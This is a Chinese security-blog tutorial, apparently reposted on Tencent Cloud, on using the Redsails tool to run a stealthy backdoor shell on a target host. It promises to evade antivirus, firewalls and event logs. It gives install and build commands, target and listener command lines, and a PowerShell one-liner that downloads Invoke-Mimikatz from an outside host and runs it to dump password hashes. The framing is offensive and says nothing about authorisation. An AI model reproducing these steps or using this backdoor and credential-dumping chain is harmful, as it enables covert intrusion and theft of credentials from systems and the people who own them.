前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >超级隐蔽之后门技巧

超级隐蔽之后门技巧

作者头像
Ms08067安全实验室
发布2019-12-18 15:01:18
7620
发布2019-12-18 15:01:18
举报

在我们以往的渗透测试中,经常会遇到目标存在杀软,防火墙等防护软件的情况,导致我们的连接不稳定以及连接中断等情况,今天就教大家如何悄无声息的绕过层层防护开启一个愉快的渗透之旅,请抓紧坐好,准备开车了。

Redsails是使用python开发的一款后渗透测试工具,其目的是可以使我们在目标主机上执行命令且无需创建任何事件日志以及网络连接,详细作用如下:

  • 在目标主机持续建立连接
  • 绕过许多常见的事件日志
  • 产生虚假日志/网络流量

Redsails依赖于PyDivert、Pycrypto和WinDivert包,我们可以使用以下命令进行安装:

代码语言:javascript
复制
pip install pydivert
pip install pbkdf2
easy_install pycrypto
在安装pycrypto之前,还需要Microsoft Visual C ++编译器。

创建可执行文件

代码语言:javascript
复制
pip install pyinstaller
pyinstaller-script.py -F --clean redSails.spec

用法

在目标主机上执行:redsails.exe -a <IP Address> -p <password> -o <port>在本地进行监听,使用相同的密码就可以获得一个shellpython redsailsClient.py -t <IP Address> -p <password> -o <port>

这时候神奇的事情发生了,我们看到shell已经连接成功,但是并未建立新的连接,连接端口也一直处于监听状态。

而更加神奇的是即使目标主机上并未开放我们的连接端口,我们也可以正常进行连接,并且不会创建新的连接。

如图,我们使用了22端口进行了连接,但是在目标主机上并未开放22端口,并且也没有任何关于22端口的连接信息。

连接成功之后,我们便可以通过redsails控制台在目标主机上执行系统命令了,执行命令方法如下:

代码语言:javascript
复制
SHELL::net users
SHELL::whoami
SHELL::ipconfig

Redsails也支持PowerShell,因此它可以执行PowerShell命令。

例如我们想对目标的hash进行抓取,我们可以这样调用Powershell脚本来执行:

代码语言:javascript
复制
PSHELL::IEX(New-Object Net.WebClient).Downloadstring('http://192.168.100.2/tmp/Invoke-Mimikatz.ps1');Invoke-Mimikatz

也可以利用powershell与Metasploit进行交互,不过这样就会建立一个新的连接,容易被防护系统检测到。

参考资料:

https://github.com/BeetleChunks/redsails%E2%80%8B%E2%80%8B

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-12-11,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Ms08067安全实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
网站渗透测试
网站渗透测试(Website Penetration Test,WPT)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节。渗透测试和黑客入侵最大区别在于渗透测试是经过客户授权,采用可控制、非破坏性质的方法和手段发现目标和网络设备中存在弱点,帮助管理者知道自己网络所面临的问题,同时提供安全加固意见帮助客户提升系统的安全性。腾讯云网站渗透测试由腾讯安全实验室安全专家进行,我们提供黑盒、白盒、灰盒多种测试方案,更全面更深入的发现客户的潜在风险。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档